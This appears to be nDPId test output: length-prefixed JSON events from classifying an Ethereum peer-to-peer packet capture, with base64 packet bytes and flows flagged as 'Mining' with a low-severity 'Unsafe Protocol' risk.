00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1578508364932,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364932,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGvd3AqAG4Etunn90\/dl9+5\/UeAAAAALAC\/\/851wAAAgQFtAEDAwUBAQgKItiVzQAAAAAEAgAA"}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":473,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364824,"flow_last_seen":1578508364933,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":571,"flow_tot_l4_payload_len":571,"flow_avg_l4_payload_len":142,"midstream":0,"thread_ts_msec":1578508364933,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"159.203.84.31","src_port":56634,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
01877{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1578508364954,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1099,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1099,"pkt_l4_len":1065,"thread_ts_msec":1578508364954,"pkt":"KDc3AG3IEBMx8Tl2CABFAAQ91J1AACwRmVQjtPapwKgBuHZddl8EKaTIL6PiPVD76wxxux15bHRlnSs2av4nBFSV7v4bhHiIpeAMxLmbK8f6wiaJfQicCaKdl2RU3riNA4G85e32CrySn3+r4nugeiGUNmLmJTGwe70KAk\/1yl9pMbVr5iHiC9EbAQT5A7z5A7T4TYSnVnoygnZfgnZfuECQJNyxBglNPC+n9m4t\/W08TtywpdWYdWjkRxmhkajaDCz+gK\/mbTitDTyIYj\/DM6dFql13rAhhOsl+TepFcV7R+E2EVmvzPoJ2X4J2X7hAs1lDgaitKFA3cxLdFsLwt7VebQyms4a6o\/fivZtKo8AkJ6dL4w4Dn4+\/vC\/\/JsKeSIScYYBOpqnxxVMZ+XWFxvhNhIui\/9KCdl+Cdl+4QKesUvPGk3pcExPSpjjyYak+S\/zgRaKyCtkCAnADlTupsK\/kU6vbTyjVeYLvjRqhlLfuaobh1XsP1yYWbMEwCkP4TYROL5ObgnZfgnZfuEBjjxCUsfvwMHRxTE5YrP7+ISCuREmPbKrzjoabqIoNEUz\/YRnAV2w6k47DZjKIksCMD5bt88unhn0EsLYp\/SzX+E2EXkQ3ooJ2X4J2X7hAPuP3gMJbiMdT+jVwpl443XaSBNUfQ0qZUmbru+9L8er4h7zKFM+7c1K4WVxLv0mgiZa++5g5WXQyn8nQTgubb\/hNhIpLq76Cdl+Cdl+4QPw+TE9tCaxzvKUZLrSUydGaIDt2Km6jvC1h7Hg9CIqQESMae7r6mkOxEncigdCNSYhdj\/fphc\/puhfvJzVEsBH4TYQj6yXYgnZfgnZfuEC5nQSZ\/xzD17vSEoHg\/jtmGLuRaM3q97\/3Czva8FggRyrw44MHO8OtruMk8OoTJc88hHmdKvMBoeGC+K0eEhFi+E2Ep1ZKIYJ2XYJ2XbhAYZoPsgtYlBM737vFkYUTo\/9EphiWRNvy3F9PFQKE60Wg2vh7fDKeVFJ2s+C3+rlsvule\/8FMZch7lhCdhu+rUPhNhJ3mmFeCdl+Cdl+4QGQs+WUN2IadQlJdv2hYAS47TWT0deczhHq293QjQaQ5dBSGXZU4dOj17ZGw5OHFM97hStHWuydqVFmyRxRg\/w34TYQ050sDgsVJgsVJuEDzSXu93jNII3idYaebqM1QwrATGCoZMfOLWHKo8\/HNEvGmOW1TsZdycKJciiZgh6ud1sRz67L9tP+HeODfKFTV+E2EDfsOx4J2X4J2X7hAH7mV1eGOz5WoeIocWFwRYF7ZVBDRcdtaFFH5u23BFJ62FH1ch71cEmxc8OtYpiPqb2N3y6mQjsQPeWAgtQws9vhNhCPknjSCdl+Cdl+4QFeAPtyTjNbAmZsxJ+YSStMfUptpi+Ck9CtWlo\/Fnkmot5zzhg4wYebjEaqIDMNNKgYreTwT+o6X4euclIzcKBSEXhYgYA=="}
01017{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1578508364954,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":467,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":467,"pkt_l4_len":433,"thread_ts_msec":1578508364954,"pkt":"KDc3AG3IEBMx8Tl2CABFAAHF1J5AACwRm8sjtPapwKgBuHZddl8BsQR1SNeP1ZrG\/ZwtEcGW5vGA0sDGp78prdWhxHtDqEDU7PNKL6kZEdICkE\/ClTr5riDvJ\/S0Juy5pZvsiDZ34LyanRNXXRjpzjohXnlvDARKWl\/FPyuFUx\/5q7iG79kKNiaGAAT5AUT5ATz4TYS5GczRgm\/xgm\/xuEBa13f1PeAY+pXn+QDG2H2vRnbUjALc47yKM1DGaLaCBXAmqDZbTzNfSqGBTAVPFFnsJtnCFC0Fv0w0bIIRmdWp+E2EijsROoJ2X4J2X7hAJi3PrTUi8k0+hp72TGveiEIya6qIgjO27CDPgcM2XClPC4ML\/96HDCNIKvA6L6b3KKoTFoGm44u2hTJ2hJ9PJvhNhM+0ztiCdl+Cdl+4QCCTHaJCBMKOiAeM0+J0ILaNmDQGKBpq95aDifzAyS6BBPIijEGzkyTvF6L1V27y7PdVSWOVkbAaliLEx1mlVCv4TYRf2EBxgnX+gnX+uEAuHZY2QcmV8WQCz4M\/VG5LfG7tHam\/sFovnjhq\/yEXmxTFgIMHUbncizgn1Jn7XeiL7CoOoCVHxB7uvvn28VO3hF4WIGA="}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1578508364957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364957,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGw5PR+vDNwKgBuHZf3T7\/g0hGkL7bbKAScSAsgwAAAgQFrAQCCAoN8FcJItiVxgEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1578508364957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364957,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGtZvAqAG40frwzd0+dl+Qvtts\/4NIR4AQECy8HAAAAQEICiLYleUN8FcJ"}
00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":490,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364924,"flow_last_seen":1578508364958,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":415,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1578508364958,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.250.240.205","src_port":56638,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1578508364990,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364990,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMGxNei5B2gwKgBuHZf3TsLfbp+uLewXqAScSA1yAAAAgQFrAQCCArR1xFdItiVcAEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1578508364990,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364990,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGt9\/AqAG4ouQdoN07dl+4t7BeC326f4AQECzE7QAAAQEICiLYlgPR1xFd"}
00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":493,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364832,"flow_last_seen":1578508364991,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":413,"flow_tot_l4_payload_len":413,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1578508364991,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.228.29.160","src_port":56635,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":567,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365009,"flow_last_seen":1578508365009,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365009,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"144.91.120.135","src_port":56641,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":567,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1578508365009,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365009,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGb3XAqAG4kFt4h91Bdl90OGLhAAAAALAC\/\/+IEgAAAgQFtAEDAwUBAQgKItiWFAAAAAAEAgAA"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":568,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365021,"flow_last_seen":1578508365021,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365021,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.10.218","src_port":56642,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":568,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1578508365021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365021,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGuz\/AqAG4sj4K2t1Cdl8xVnl5AAAAALAC\/\/8AHAAAAgQFtAEDAwUBAQgKItiWHgAAAAAEAgAA"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":569,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365029,"flow_last_seen":1578508365029,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365029,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.29.183","src_port":56643,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1578508365029,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365029,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGqGLAqAG4sj4dt91Ddl+W2yuDAAAAALAC\/\/\/VpgAAAgQFtAEDAwUBAQgKItiWJgAAAAAEAgAA"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":598,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365038,"flow_last_seen":1578508365038,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365038,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.230.108.42","src_port":56644,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":598,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1578508365038,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365038,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG\/kfAqAG4DeZsKt1Edl+KMGOvAAAAALAC\/\/8AAwAAAgQFtAEDAwUBAQgKItiWLQAAAAAEAgAA"}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":605,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1578508365039,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365039,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGe3mQW3iHwKgBuHZf3UEpl2emdDhi4qAScSAVuAAAAgQFrAQCCArbhaVwItiWFAEDAwc="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":606,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1578508365039,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365039,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGb4HAqAG4kFt4h91Bdl90OGLiKZdnp4AQECylVgAAAQEICiLYli7bhaVw"}
00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":607,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365009,"flow_last_seen":1578508365040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1578508365040,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"144.91.120.135","src_port":56641,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":645,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365045,"flow_last_seen":1578508365045,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365045,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"185.219.133.62","src_port":56645,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1578508365045,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365045,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGOT7AqAG4uduFPt1Fdl+PNscoAAAAALAC\/\/\/ScwAAAgQFtAEDAwUBAQgKItiWMgAAAAAEAgAA"}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1578508365063,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365063,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACMG2uES26efwKgBuHZf3T9fy8\/Lfuf1H6ASaN8cNgAAAgQFrAQCCAoSyYNbItiVzQEDAwc="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1578508365063,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365063,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGvenAqAG4Etunn90\/dl9+5\/UfX8vPzIAQECyjNQAAAQEICiLYlkUSyYNb"}
00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":648,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364932,"flow_last_seen":1578508365065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":521,"flow_tot_l4_payload_len":521,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1578508365065,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":56639,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":649,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1578508365065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365065,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGx0OyPgrawKgBuHZf3UIGbP5HMVZ5eqAScSDZAAAAAgQFrAQCCAoLgra+ItiWHgEDAwc="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1578508365065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365065,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGu0vAqAG4sj4K2t1Cdl8xVnl6Bmz+SIAQECxokQAAAQEICiLYlkYLgra+"}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1578508364957,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364957,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGw5PR+vDNwKgBuHZf3T7\/g0hGkL7bbKAScSAsgwAAAgQFrAQCCAoN8FcJItiVxgEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1578508364957,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364957,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGtZvAqAG40frwzd0+dl+Qvtts\/4NIR4AQECy8HAAAAQEICiLYleUN8FcJ"}
00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":490,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364924,"flow_last_seen":1578508364958,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":415,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1578508364958,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.250.240.205","src_port":56638,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1578508364990,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364990,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMGxNei5B2gwKgBuHZf3TsLfbp+uLewXqAScSA1yAAAAgQFrAQCCArR1xFdItiVcAEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1578508364990,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364990,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGt9\/AqAG4ouQdoN07dl+4t7BeC326f4AQECzE7QAAAQEICiLYlgPR1xFd"}
00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":493,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364832,"flow_last_seen":1578508364991,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":413,"flow_tot_l4_payload_len":413,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1578508364991,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.228.29.160","src_port":56635,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":567,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365009,"flow_last_seen":1578508365009,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365009,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"144.91.120.135","src_port":56641,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":567,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1578508365009,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365009,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGb3XAqAG4kFt4h91Bdl90OGLhAAAAALAC\/\/+IEgAAAgQFtAEDAwUBAQgKItiWFAAAAAAEAgAA"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":568,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365021,"flow_last_seen":1578508365021,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365021,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.10.218","src_port":56642,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":568,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1578508365021,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365021,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGuz\/AqAG4sj4K2t1Cdl8xVnl5AAAAALAC\/\/8AHAAAAgQFtAEDAwUBAQgKItiWHgAAAAAEAgAA"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":569,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365029,"flow_last_seen":1578508365029,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365029,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.29.183","src_port":56643,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1578508365029,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365029,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGqGLAqAG4sj4dt91Ddl+W2yuDAAAAALAC\/\/\/VpgAAAgQFtAEDAwUBAQgKItiWJgAAAAAEAgAA"}
